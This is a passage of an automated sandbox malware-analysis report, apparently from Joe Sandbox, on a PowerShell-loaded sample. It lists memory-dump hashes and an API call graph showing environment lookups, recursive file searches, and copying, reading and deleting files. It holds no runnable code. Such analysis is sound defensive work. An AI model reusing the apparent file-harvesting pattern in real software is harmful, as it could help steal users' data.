                      • Instruction Fuzzy Hash: C7F0C271105354AEE7108E15DE84B62FF98EB91738F18C05AED484F296C279A844CAB1
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef30967a58b40ca00273053dc61d5507926adf086a068e2016bca7d222dc71ee
                      • Instruction ID: 67538f2d2e86cf128edd711e4c4ea658c386ec13c25c001bd32e50a6c703ca79
                      • Opcode Fuzzy Hash: ef30967a58b40ca00273053dc61d5507926adf086a068e2016bca7d222dc71ee
                      • Instruction Fuzzy Hash: 2CF039742192C18FC7128B10C890AA5BF71AB87211F19C0CAD048CF2A3CB77CD42C751
                      Memory Dump Source
                      • Source File: 00000004.00000002.2449825625.0000000004D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D2D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4d2d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7856e21c010f4ca0f221a27172aa02ed4ec2300fda8df8392d673e3fdfdfece
                      • Instruction ID: 628faca77d863a515a7d4c74ecfdbfce959920f8a720add3913b746eabec03eb
                      • Opcode Fuzzy Hash: d7856e21c010f4ca0f221a27172aa02ed4ec2300fda8df8392d673e3fdfdfece
                      • Instruction Fuzzy Hash: 4B213A72604244DFDB04DF14DAC0F16BF66FBA4328F24C56DD90A0B246C33AE456CBA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$(f^l$(f^l$4[l$4[l$tLPk
                      • API String ID: 0-1362849106
                      • Opcode ID: e0a3460042c99458439f639bec538d11617cddbfb20f931408c2214926ff4e7a
                      • Instruction ID: 496550cfc1257363cf953830746a64a669869e1c9eeaf632c97d9d9b9b331b45
                      • Opcode Fuzzy Hash: e0a3460042c99458439f639bec538d11617cddbfb20f931408c2214926ff4e7a
                      • Instruction Fuzzy Hash: E761CFB1B00205DBDB24DBA9C891F6ABBF2BF89214F158169D905AB750CF31DD41CB92
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$x.Ok$-Ok
                      • API String ID: 0-4128635447
                      • Opcode ID: 150fdd66dd60a956bf5735832adf4405f230171823d1f73102e0cdfb480e8ca2
                      • Instruction ID: 9c61fcfe1d332511ae33c87f05194c1f741d82d3092e8e83c812c36e75decd8e
                      • Opcode Fuzzy Hash: 150fdd66dd60a956bf5735832adf4405f230171823d1f73102e0cdfb480e8ca2
                      • Instruction Fuzzy Hash: 1FC1B2B4A00209DBDB24DF94C891FAEBBF3BF89714F258419E5066B745CB31ED428B51
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 84\l$84\l$84\l$84\l
                      • API String ID: 0-3626634769
                      • Opcode ID: dd738a6f21f77069ec86912fe00a80afc19c8e409441ce28dfe3e019aa685587
                      • Instruction ID: 6f2f226d23650f18b2f1e01949623c5d5a25132c19945c45f8e0e265d5f3ae86
                      • Opcode Fuzzy Hash: dd738a6f21f77069ec86912fe00a80afc19c8e409441ce28dfe3e019aa685587
                      • Instruction Fuzzy Hash: 5DA106B1B00206DFDB24AF65C854BBABBF6BF85310F148469EA469B385DB31DD40C7A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$(f^l$(f^l
                      • API String ID: 0-1287301838
                      • Opcode ID: 8b0f722eeaf6d85c182b3052fb7a4da78973255543081077132f80effc630fca
                      • Instruction ID: 3dea999120e56e4275653ca49bbf5cbd68fdff0d06990d3879350f693c7c2689
                      • Opcode Fuzzy Hash: 8b0f722eeaf6d85c182b3052fb7a4da78973255543081077132f80effc630fca
                      • Instruction Fuzzy Hash: C2715FB0A01209DFDB24CF98C895A6EBBF2FF89314F148169E915AB355CB31ED41CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$4[l$tLPk
                      • API String ID: 0-1080456753
                      • Opcode ID: e286958fdec493100fc21b09a92d406927d6d583157dc3d98a31ce534500b223
                      • Instruction ID: 0c68ec689004e84154a5c57e214941839db82edfc49cd5facaa9a02c0b67c730
                      • Opcode Fuzzy Hash: e286958fdec493100fc21b09a92d406927d6d583157dc3d98a31ce534500b223
                      • Instruction Fuzzy Hash: BE51B4B1A01202DFDB24CF95C891FAABBF2BF89314F15C569D905AB351CB32D941CB91

                      Execution Graph

                      Execution Coverage:2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:2.8%
                      Total number of Nodes:1556
                      Total number of Limit Nodes:1
                      execution_graph 6781 23592418 6782 23592420 ___scrt_release_startup_lock 6781->6782 6785 235947f5 6782->6785 6784 23592448 6786 23594808 6785->6786 6787 23594804 6785->6787 6790 23594815 6786->6790 6787->6784 6791 23595b7a __dosmaperr 20 API calls 6790->6791 6794 2359482c 6791->6794 6792 23592ada _ValidateLocalCookies 5 API calls 6793 23594811 6792->6793 6793->6784 6794->6792 5739 23591c5b 5740 23591c6b ___scrt_fastfail 5739->5740 5743 235912ee 5740->5743 5742 23591c87 5744 23591324 ___scrt_fastfail 5743->5744 5745 235913b7 GetEnvironmentVariableW 5744->5745 5769 235910f1 5745->5769 5748 235910f1 57 API calls 5749 23591465 5748->5749 5750 235910f1 57 API calls 5749->5750 5751 23591479 5750->5751 5752 235910f1 57 API calls 5751->5752 5753 2359148d 5752->5753 5754 235910f1 57 API calls 5753->5754 5755 235914a1 5754->5755 5756 235910f1 57 API calls 5755->5756 5757 235914b5 lstrlenW 5756->5757 5758 235914d9 lstrlenW 5757->5758 5759 235914d2 5757->5759 5760 235910f1 57 API calls 5758->5760 5759->5742 5761 23591501 lstrlenW lstrcatW 5760->5761 5762 235910f1 57 API calls 5761->5762 5763 23591539 lstrlenW lstrcatW 5762->5763 5764 235910f1 57 API calls 5763->5764 5765 2359156b lstrlenW lstrcatW 5764->5765 5766 235910f1 57 API calls 5765->5766 5767 2359159d lstrlenW lstrcatW 5766->5767 5768 235910f1 57 API calls 5767->5768 5768->5759 5770 23591118 ___scrt_fastfail 5769->5770 5771 23591129 lstrlenW 5770->5771 5782 23592c40 5771->5782 5774 23591168 lstrlenW 5775 23591177 lstrlenW FindFirstFileW 5774->5775 5776 235911e1 5775->5776 5777 235911a0 5775->5777 5776->5748 5778 235911c7 FindNextFileW 5777->5778 5781 235911aa 5777->5781 5778->5777 5779 235911da FindClose 5778->5779 5779->5776 5781->5778 5784 23591000 5781->5784 5783 23591148 lstrcatW lstrlenW 5782->5783 5783->5774 5783->5775 5785 23591022 ___scrt_fastfail 5784->5785 5786 235910af 5785->5786 5787 2359102f lstrcatW lstrlenW 5785->5787 5790 235910ad 5786->5790 5791 235910b5 lstrlenW 5786->5791 5788 2359106b lstrlenW 5787->5788 5789 2359105a lstrlenW 5787->5789 5801 23591e89 lstrlenW 5788->5801 5789->5788 5790->5781 5815 23591e16 5791->5815 5794 23591088 GetFileAttributesW 5794->5790 5796 2359109c 5794->5796 5795 235910ca 5795->5790 5797 23591e89 5 API calls 5795->5797 5796->5790 5807 2359173a 5796->5807 5799 235910df 5797->5799 5820 235911ea 5799->5820 5802 23592c40 ___scrt_fastfail 5801->5802 5803 23591ea7 lstrcatW lstrlenW 5802->5803 5804 23591ed1 lstrcatW 5803->5804 5805 23591ec2 5803->5805 5804->5794 5805->5804 5806 23591ec7 lstrlenW 5805->5806 5806->5804 5808 23591747 ___scrt_fastfail 5807->5808 5835 23591cca 5808->5835 5811 2359199f 5811->5790 5813 23591824 ___scrt_fastfail _strlen 5813->5811 5855 235915da 5813->5855 5816 23591e29 5815->5816 5819 23591e4c 5815->5819 5817 23591e2d lstrlenW 5816->5817 5816->5819 5818 23591e3f lstrlenW 5817->5818 5817->5819 5818->5819 5819->5795 5821 2359120e ___scrt_fastfail 5820->5821 5822 23591e89 5 API calls 5821->5822 5823 23591220 GetFileAttributesW 5822->5823 5824 23591235 5823->5824 5825 23591246 5823->5825 5824->5825 5827 2359173a 35 API calls 5824->5827 5826 23591e89 5 API calls 5825->5826 5828 23591258 5826->5828 5827->5825 5829 235910f1 56 API calls 5828->5829 5830 2359126d 5829->5830 5831 23591e89 5 API calls 5830->5831 5832 2359127f ___scrt_fastfail 5831->5832 5833 235910f1 56 API calls 5832->5833 5834 235912e6 5833->5834 5834->5790 5836 23591cf1 ___scrt_fastfail 5835->5836 5837 23591d0f CopyFileW CreateFileW 5836->5837 5838 23591d55 GetFileSize 5837->5838 5839 23591d44 DeleteFileW 5837->5839 5840 23591ede 22 API calls 5838->5840 5844 23591808 5839->5844 5841 23591d66 ReadFile 5840->5841 5842 23591d7d CloseHandle DeleteFileW 5841->5842 5843 23591d94 CloseHandle DeleteFileW 5841->5843 5842->5844 5843->5844 5844->5811 5845 23591ede 5844->5845 5847 2359222f 5845->5847 5848 2359224e 5847->5848 5850 23592250 5847->5850 5863 2359474f 5847->5863 5868 235947e5 5847->5868 5848->5813 5851 23592908 5850->5851 5875 235935d2 5850->5875 5852 235935d2 __CxxThrowException@8 RaiseException 5851->5852 5854 23592925 5852->5854 5854->5813 5856 2359160c _strcat _strlen 5855->5856 5857 2359163c lstrlenW 5856->5857 5963 23591c9d 5857->5963 5859 23591655 lstrcatW lstrlenW 5860 23591678 5859->5860 5861 2359167e lstrcatW 5860->5861 5862 23591693 ___scrt_fastfail 5860->5862 5861->5862 5862->5813 5878 23594793 5863->5878 5866 2359478f 5866->5847 5867 23594765 5884 23592ada 5867->5884 5874 235956d0 __dosmaperr 5868->5874 5869 2359570e 5897 23596368 5869->5897 5871 235956f9 RtlAllocateHeap 5872 2359570c 5871->5872 5871->5874 5872->5847 5873 2359474f __dosmaperr 7 API calls 5873->5874 5874->5869 5874->5871 5874->5873 5876 235935f2 RaiseException 5875->5876 5876->5851 5879 2359479f ___DestructExceptionObject 5878->5879 5891 23595671 RtlEnterCriticalSection 5879->5891 5881 235947aa 5892 235947dc 5881->5892 5883 235947d1 _abort 5883->5867 5885 23592ae3 5884->5885 5886 23592ae5 IsProcessorFeaturePresent 5884->5886 5885->5866 5888 23592b58 5886->5888 5896 23592b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5888->5896 5890 23592c3b 5890->5866 5891->5881 5895 235956b9 RtlLeaveCriticalSection 5892->5895 5894 235947e3 5894->5883 5895->5894 5896->5890 5900 23595b7a GetLastError 5897->5900 5901 23595b99 5900->5901 5902 23595b93 5900->5902 5907 23595bf0 SetLastError 5901->5907 5926 2359637b 5901->5926 5919 23595e08 5902->5919 5906 23595bb3 5933 2359571e 5906->5933 5908 23595bf9 5907->5908 5908->5872 5912 23595bb9 5914 23595be7 SetLastError 5912->5914 5913 23595bcf 5946 2359593c 5913->5946 5914->5908 5917 2359571e _free 17 API calls 5918 23595be0 5917->5918 5918->5907 5918->5914 5951 23595c45 5919->5951 5921 23595e2f 5922 23595e47 TlsGetValue 5921->5922 5923 23595e3b 5921->5923 5922->5923 5924 23592ada _ValidateLocalCookies 5 API calls 5923->5924 5925 23595e58 5924->5925 5925->5901 5932 23596388 __dosmaperr 5926->5932 5927 235963c8 5930 23596368 __dosmaperr 19 API calls 5927->5930 5928 235963b3 RtlAllocateHeap 5929 23595bab 5928->5929 5928->5932 5929->5906 5939 23595e5e 5929->5939 5930->5929 5931 2359474f __dosmaperr 7 API calls 5931->5932 5932->5927 5932->5928 5932->5931 5934 23595729 HeapFree 5933->5934 5935 23595752 __dosmaperr 5933->5935 5934->5935 5936 2359573e 5934->5936 5935->5912 5937 23596368 __dosmaperr 18 API calls 5936->5937 5938 23595744 GetLastError 5937->5938 5938->5935 5940 23595c45 __dosmaperr 5 API calls 5939->5940 5941 23595e85 5940->5941 5942 23595ea0 TlsSetValue 5941->5942 5943 23595e94 5941->5943 5942->5943 5944 23592ada _ValidateLocalCookies 5 API calls 5943->5944 5945 23595bc8 5944->5945 5945->5906 5945->5913 5957 23595914 5946->5957 5952 23595c75 __crt_fast_encode_pointer 5951->5952 5953 23595c71 5951->5953 5952->5921 5953->5952 5954 23595ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5953->5954 5956 23595c95 5953->5956 5954->5953 5955 23595ca1 GetProcAddress 5955->5952 5956->5952 5956->5955 5958 23595854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5957->5958 5959 23595938 5958->5959 5960 235958c4 5959->5960 5961 23595758 __dosmaperr 20 API calls 5960->5961 5962 235958e8 5961->5962 5962->5917 5964 23591ca6 _strlen 5963->5964 5964->5859 6949 235920db 6951 235920e7 ___DestructExceptionObject 6949->6951 6950 23592110 dllmain_raw 6952 235920f6 6950->6952 6953 2359212a 6950->6953 6951->6950 6951->6952 6956 2359210b 6951->6956 6962 23591eec 6953->6962 6955 23592177 6955->6952 6957 23591eec 31 API calls 6955->6957 6956->6952 6956->6955 6959 23591eec 31 API calls 6956->6959 6958 2359218a 6957->6958 6958->6952 6960 23592193 dllmain_raw 6958->6960 6961 2359216d dllmain_raw 6959->6961 6960->6952 6961->6955 6963 23591f2a dllmain_crt_process_detach 6962->6963 6964 23591ef7 6962->6964 6971 23591f06 6963->6971 6965 23591f1c dllmain_crt_process_attach 6964->6965 6966 23591efc 6964->6966 6965->6971 6967 23591f01 6966->6967 6968 23591f12 6966->6968 6967->6971 6972 2359240b 6967->6972 6977 235923ec 6968->6977 6971->6956 6985 235953e5 6972->6985 7106 23593513 6977->7106 6980 235923f5 6980->6971 6983 23592408 6983->6971 6984 2359351e 7 API calls 6984->6980 6991 23595aca 6985->6991 6988 2359351e 7095 23593820 6988->7095 6990 23592415 6990->6971 6992 23592410 6991->6992 6993 23595ad4 6991->6993 6992->6988 6994 23595e08 __dosmaperr 11 API calls 6993->6994 6995 23595adb 6994->6995 6995->6992 6996 23595e5e __dosmaperr 11 API calls 6995->6996 6997 23595aee 6996->6997 6999 235959b5 6997->6999 7000 235959c0 6999->7000 7001 235959d0 6999->7001 7005 235959d6 7000->7005 7001->6992 7004 2359571e _free 20 API calls 7004->7001 7006 235959e9 7005->7006 7007 235959ef 7005->7007 7008 2359571e _free 20 API calls 7006->7008 7009 2359571e _free 20 API calls 7007->7009 7008->7007 7010 235959fb 7009->7010 7011 2359571e _free 20 API calls 7010->7011 7012 23595a06 7011->7012 7013 2359571e _free 20 API calls 7012->7013 7014 23595a11 7013->7014 7015 2359571e _free 20 API calls 7014->7015 7016 23595a1c 7015->7016 7017 2359571e _free 20 API calls 7016->7017 7018 23595a27 7017->7018 7019 2359571e _free 20 API calls 7018->7019 7020 23595a32 7019->7020 7021 2359571e _free 20 API calls 7020->7021 7022 23595a3d 7021->7022 7023 2359571e _free 20 API calls 7022->7023 7024 23595a48 7023->7024 7025 2359571e _free 20 API calls 7024->7025 7026 23595a56 7025->7026 7031 2359589c 7026->7031 7037 235957a8 7031->7037 7033 235958c0 7034 235958ec 7033->7034 7050 23595809 7034->7050 7036 23595910 7036->7004 7038 235957b4 ___DestructExceptionObject 7037->7038 7045 23595671 RtlEnterCriticalSection 7038->7045 7040 235957e8 7046 235957fd 7040->7046 7042 235957f5 _abort 7042->7033 7043 235957be 7043->7040 7044 2359571e _free 20 API calls 7043->7044 7044->7040 7045->7043 7049 235956b9 RtlLeaveCriticalSection 7046->7049 7048 23595807 7048->7042 7049->7048 7051 23595815 ___DestructExceptionObject 7050->7051 7058 23595671 RtlEnterCriticalSection 7051->7058 7053 2359581f 7059 23595a7f 7053->7059 7055 23595832 7063 23595848 7055->7063 7057 23595840 _abort 7057->7036 7058->7053 7060 23595a8e __fassign 7059->7060 7061 23595ab5 __fassign 7059->7061 7060->7061 7066 23597cc2 7060->7066 7061->7055 7094 235956b9 RtlLeaveCriticalSection 7063->7094 7065 23595852 7065->7057 7067 23597d42 7066->7067 7070 23597cd8 7066->7070 7069 2359571e _free 20 API calls 7067->7069 7092 23597d90 7067->7092 7068 23597e35 __fassign 20 API calls 7073 23597d9e 7068->7073 7071 23597d64 7069->7071 7070->7067 7074 2359571e _free 20 API calls 7070->7074 7076 23597d0b 7070->7076 7072 2359571e _free 20 API calls 7071->7072 7075 23597d77 7072->7075 7078 23597dfe 7073->7078 7084 2359571e 20 API calls _free 7073->7084 7079 23597d00 7074->7079 7080 2359571e _free 20 API calls 7075->7080 7081 2359571e _free 20 API calls 7076->7081 7093 23597d2d 7076->7093 7077 2359571e _free 20 API calls 7082 23597d37 7077->7082 7083 2359571e _free 20 API calls 7078->7083 7085 235990ba ___free_lconv_mon 20 API calls 7079->7085 7086 23597d85 7080->7086 7087 23597d22 7081->7087 7088 2359571e _free 20 API calls 7082->7088 7089 23597e04 7083->7089 7084->7073 7085->7076 7090 2359571e _free 20 API calls 7086->7090 7091 235991b8 __fassign 20 API calls 7087->7091 7088->7067 7089->7061 7090->7092 7091->7093 7092->7068 7093->7077 7094->7065 7096 2359382d 7095->7096 7100 2359384b ___vcrt_freefls@4 7095->7100 7097 2359383b 7096->7097 7101 23593b67 7096->7101 7098 23593ba2 ___vcrt_FlsSetValue 6 API calls 7097->7098 7098->7100 7100->6990 7102 23593a82 try_get_function 5 API calls 7101->7102 7103 23593b81 7102->7103 7104 23593b99 TlsGetValue 7103->7104 7105 23593b8d 7103->7105 7104->7105 7105->7097 7112 23593856 7106->7112 7108 235923f1 7108->6980 7109 235953da 7108->7109 7110 23595b7a __dosmaperr 20 API calls 7109->7110 7111 235923fd 7110->7111 7111->6983 7111->6984 7113 2359385f 7112->7113 7114 23593862 GetLastError 7112->7114 7113->7108 7115 23593b67 ___vcrt_FlsGetValue 6 API calls 7114->7115 7116 23593877 7115->7116 7117 235938dc SetLastError 7116->7117 7118 23593ba2 ___vcrt_FlsSetValue 6 API calls 7116->7118 7123 23593896 7116->7123 7117->7108 7119 23593890 7118->7119 7120 235938b8 7119->7120 7121 23593ba2 ___vcrt_FlsSetValue 6 API calls 7119->7121 7119->7123 7122 23593ba2 ___vcrt_FlsSetValue 6 API calls 7120->7122 7120->7123 7121->7120 7122->7123 7123->7117 7508 23594a9a 7511 23595411 7508->7511 7512 2359541d _abort 7511->7512 7513 23595af6 _abort 38 API calls 7512->7513 7516 23595422 7513->7516 7514 235955a8 _abort 38 API calls 7515 2359544c 7514->7515 7516->7514 7124 23594bdd 7125 23594c08 7124->7125 7126 23594bec 7124->7126 7147 23596d60 7125->7147 7126->7125 7128 23594bf2 7126->7128 7129 23596368 __dosmaperr 20 API calls 7128->7129 7131 23594bf7 7129->7131 7133 235962ac ___std_exception_copy 26 API calls 7131->7133 7132 23594c33 7151 23594d01 7132->7151 7134 23594c01 7133->7134 7139 23594c72 7141 23594d01 38 API calls 7139->7141 7140 23594c66 7142 23596368 __dosmaperr 20 API calls 7140->7142 7144 23594c88 7141->7144 7146 23594c6b 7142->7146 7143 2359571e _free 20 API calls 7143->7134 7145 2359571e _free 20 API calls 7144->7145 7144->7146 7145->7146 7146->7143 7148 23596d69 7147->7148 7149 23594c0f GetModuleFileNameA 7147->7149 7163 23596c5f 7148->7163 7149->7132 7153 23594d26 7151->7153 7155 23594d86 7153->7155 7319 235970eb 7153->7319 7154 23594c50 7157 23594e76 7154->7157 7155->7154 7156 235970eb 38 API calls 7155->7156 7156->7155 7158 23594c5d 7157->7158 7159 23594e8b 7157->7159 7158->7139 7158->7140 7159->7158 7160 2359637b __dosmaperr 20 API calls 7159->7160 7161 23594eb9 7160->7161 7162 2359571e _free 20 API calls 7161->7162 7162->7158 7164 23595af6 _abort 38 API calls 7163->7164 7165 23596c6c 7164->7165 7166 23596d7e __fassign 38 API calls 7165->7166 7167 23596c74 7166->7167 7183 235969f3 7167->7183 7170 23596c8b 7170->7149 7173 23596cce 7176 2359571e _free 20 API calls 7173->7176 7176->7170 7177 23596cc9 7178 23596368 __dosmaperr 20 API calls 7177->7178 7178->7173 7179 23596d12 7179->7173 7207 235968c9 7179->7207 7180 23596ce6 7180->7179 7181 2359571e _free 20 API calls 7180->7181 7181->7179 7184 235954a7 __fassign 38 API calls 7183->7184 7185 23596a05 7184->7185 7186 23596a14 GetOEMCP 7185->7186 7187 23596a26 7185->7187 7189 23596a3d 7186->7189 7188 23596a2b GetACP 7187->7188 7187->7189 7188->7189 7189->7170 7190 235956d0 7189->7190 7191 2359570e 7190->7191 7195 235956de __dosmaperr 7190->7195 7192 23596368 __dosmaperr 20 API calls 7191->7192 7194 2359570c 7192->7194 7193 235956f9 RtlAllocateHeap 7193->7194 7193->7195 7194->7173 7197 23596e20 7194->7197 7195->7191 7195->7193 7196 2359474f __dosmaperr 7 API calls 7195->7196 7196->7195 7198 235969f3 40 API calls 7197->7198 7199 23596e3f 7198->7199 7202 23596e90 IsValidCodePage 7199->7202 7204 23596e46 7199->7204 7205 23596eb5 ___scrt_fastfail 7199->7205 7200 23592ada _ValidateLocalCookies 5 API calls 7201 23596cc1 7200->7201 7201->7177 7201->7180 7203 23596ea2 GetCPInfo 7202->7203 7202->7204 7203->7204 7203->7205 7204->7200 7210 23596acb GetCPInfo 7205->7210 7283 23596886 7207->7283 7209 235968ed 7209->7173 7216 23596b05 7210->7216 7219 23596baf 7210->7219 7213 23592ada _ValidateLocalCookies 5 API calls 7215 23596c5b 7213->7215 7215->7204 7220 235986e4 7216->7220 7218 23598a3e 43 API calls 7218->7219 7219->7213 7221 235954a7 __fassign 38 API calls 7220->7221 7222 23598704 MultiByteToWideChar 7221->7222 7224 235987da 7222->7224 7225 23598742 7222->7225 7226 23592ada _ValidateLocalCookies 5 API calls 7224->7226 7228 235956d0 21 API calls 7225->7228 7231 23598763 ___scrt_fastfail 7225->7231 7229 23596b66 7226->7229 7227 235987d4 7239 23598801 7227->7239 7228->7231 7234 23598a3e 7229->7234 7231->7227 7232 235987a8 MultiByteToWideChar 7231->7232 7232->7227 7233 235987c4 GetStringTypeW 7232->7233 7233->7227 7235 235954a7 __fassign 38 API calls 7234->7235 7236 23598a51 7235->7236 7243 23598821 7236->7243 7240 2359880d 7239->7240 7242 2359881e 7239->7242 7241 2359571e _free 20 API calls 7240->7241 7240->7242 7241->7242 7242->7224 7245 2359883c 7243->7245 7244 23598862 MultiByteToWideChar 7246 23598a16 7244->7246 7247 2359888c 7244->7247 7245->7244 7248 23592ada _ValidateLocalCookies 5 API calls 7246->7248 7250 235956d0 21 API calls 7247->7250 7254 235988ad 7247->7254 7249 23596b87 7248->7249 7249->7218 7250->7254 7251 23598962 7256 23598801 __freea 20 API calls 7251->7256 7252 235988f6 MultiByteToWideChar 7252->7251 7253 2359890f 7252->7253 7270 23595f19 7253->7270 7254->7251 7254->7252 7256->7246 7258 23598939 7258->7251 7261 23595f19 11 API calls 7258->7261 7259 23598971 7260 235956d0 21 API calls 7259->7260 7263 23598992 7259->7263 7260->7263 7261->7251 7262 23598a07 7265 23598801 __freea 20 API calls 7262->7265 7263->7262 7264 23595f19 11 API calls 7263->7264 7266 235989e6 7264->7266 7265->7251 7266->7262 7267 235989f5 WideCharToMultiByte 7266->7267 7267->7262 7268 23598a35 7267->7268 7269 23598801 __freea 20 API calls 7268->7269 7269->7251 7271 23595c45 __dosmaperr 5 API calls 7270->7271 7272 23595f40 7271->7272 7274 23595f49 7272->7274 7278 23595fa1 7272->7278 7276 23592ada _ValidateLocalCookies 5 API calls 7274->7276 7277 23595f9b 7276->7277 7277->7251 7277->7258 7277->7259 7279 23595c45 __dosmaperr 5 API calls 7278->7279 7280 23595fc8 7279->7280 7281 23592ada _ValidateLocalCookies 5 API calls 7280->7281 7282 23595f89 LCMapStringW 7281->7282 7282->7274 7284 23596892 ___DestructExceptionObject 7283->7284 7291 23595671 RtlEnterCriticalSection 7284->7291 7286 2359689c 7292 235968f1 7286->7292 7290 235968b5 _abort 7290->7209 7291->7286 7304 23597011 7292->7304 7294 2359693f 7295 23597011 26 API calls 7294->7295 7296 2359695b 7295->7296 7297 23597011 26 API calls 7296->7297 7298 23596979 7297->7298 7299 235968a9 7298->7299 7300 2359571e _free 20 API calls 7298->7300 7301 235968bd 7299->7301 7300->7299 7318 235956b9 RtlLeaveCriticalSection 7301->7318 7303 235968c7 7303->7290 7305 23597022 7304->7305 7308 2359701e 7304->7308 7306 23597029 7305->7306 7310 2359703c ___scrt_fastfail 7305->7310 7307 23596368 __dosmaperr 20 API calls 7306->7307 7309 2359702e 7307->7309 7308->7294 7311 235962ac ___std_exception_copy 26 API calls 7309->7311 7310->7308 7312 2359706a 7310->7312 7314 23597073 7310->7314 7311->7308 7313 23596368 __dosmaperr 20 API calls 7312->7313 7315 2359706f 7313->7315 7314->7308 7316 23596368 __dosmaperr 20 API calls 7314->7316 7317 235962ac ___std_exception_copy 26 API calls 7315->7317 7316->7315 7317->7308 7318->7303 7322 23597092 7319->7322 7323 235954a7 __fassign 38 API calls 7322->7323 7324 235970a6 7323->7324 7324->7153 6795 2359281c 6796 23592882 std::exception::exception 27 API calls 6795->6796 6797 2359282a 6796->6797 5965 23595351 5966 23595360 5965->5966 5971 23595374 5965->5971 5969 2359571e _free 20 API calls 5966->5969 5966->5971 5967 2359571e _free 20 API calls 5968 23595386 5967->5968 5970 2359571e _free 20 API calls 5968->5970 5969->5971 5972 23595399 5970->5972 5971->5967 5973 2359571e _free 20 API calls 5972->5973 5974 235953aa 5973->5974 5975 2359571e _free 20 API calls 5974->5975 5976 235953bb 5975->5976 7325 235936d0 7326 235936e2 7325->7326 7328 235936f0 @_EH4_CallFilterFunc@8 7325->7328 7327 23592ada _ValidateLocalCookies 5 API calls 7326->7327 7327->7328 7517 23593c90 RtlUnwind 7329 235973d5 7330 235973e1 ___DestructExceptionObject 7329->7330 7341 23595671 RtlEnterCriticalSection 7330->7341 7332 235973e8 7342 23598be3 7332->7342 7334 235973f7 7335 23597406 7334->7335 7355 23597269 GetStartupInfoW 7334->7355 7366 23597422 7335->7366 7340 23597417 _abort 7341->7332 7343 23598bef ___DestructExceptionObject 7342->7343 7344 23598bfc 7343->7344 7345 23598c13 7343->7345 7346 23596368 __dosmaperr 20 API calls 7344->7346 7369 23595671 RtlEnterCriticalSection 7345->7369 7348 23598c01 7346->7348 7349 235962ac ___std_exception_copy 26 API calls 7348->7349 7353 23598c0b _abort 7349->7353 7351 23598c1f 7354 23598c4b 7351->7354 7370 23598b34 7351->7370 7353->7334 7377 23598c72 7354->7377 7356 23597318 7355->7356 7357 23597286 7355->7357 7361 2359731f 7356->7361 7357->7356 7358 23598be3 27 API calls 7357->7358 7359 235972af 7358->7359 7359->7356 7360 235972dd GetFileType 7359->7360 7360->7359 7365 23597326 7361->7365 7362 23597369 GetStdHandle 7362->7365 7363 235973d1 7363->7335 7364 2359737c GetFileType 7364->7365 7365->7362 7365->7363 7365->7364 7381 235956b9 RtlLeaveCriticalSection 7366->7381 7368 23597429 7368->7340 7369->7351 7371 2359637b __dosmaperr 20 API calls 7370->7371 7372 23598b46 7371->7372 7374 23595eb7 11 API calls 7372->7374 7376 23598b53 7372->7376 7373 2359571e _free 20 API calls 7375 23598ba5 7373->7375 7374->7372 7375->7351 7376->7373 7380 235956b9 RtlLeaveCriticalSection 7377->7380 7379 23598c79 7379->7353 7380->7379 7381->7368 7382 23594ed7 7383 23596d60 51 API calls 7382->7383 7384 23594ee9 7383->7384 7393 23597153 GetEnvironmentStringsW 7384->7393 7388 2359571e _free 20 API calls 7389 23594f29 7388->7389 7390 23594eff 7391 2359571e _free 20 API calls 7390->7391 7392 23594ef4 7391->7392 7392->7388 7394 2359716a 7393->7394 7404 235971bd 7393->7404 7397 23597170 WideCharToMultiByte 7394->7397 7395 23594eee 7395->7392 7405 23594f2f 7395->7405 7396 235971c6 FreeEnvironmentStringsW 7396->7395 7398 2359718c 7397->7398 7397->7404 7399 235956d0 21 API calls 7398->7399 7400 23597192 7399->7400 7401 23597199 WideCharToMultiByte 7400->7401 7402 235971af 7400->7402 7401->7402 7403 2359571e _free 20 API calls 7402->7403 7403->7404 7404->7395 7404->7396 7406 23594f44 7405->7406 7407 2359637b __dosmaperr 20 API calls 7406->7407 7418 23594f6b 7407->7418 7408 23594fcf 7409 2359571e _free 20 API calls 7408->7409 7410 23594fe9 7409->7410 7410->7390 7411 2359637b __dosmaperr 20 API calls 7411->7418 7412 23594fd1 7413 23595000 20 API calls 7412->7413 7415 23594fd7 7413->7415 7414 2359544d 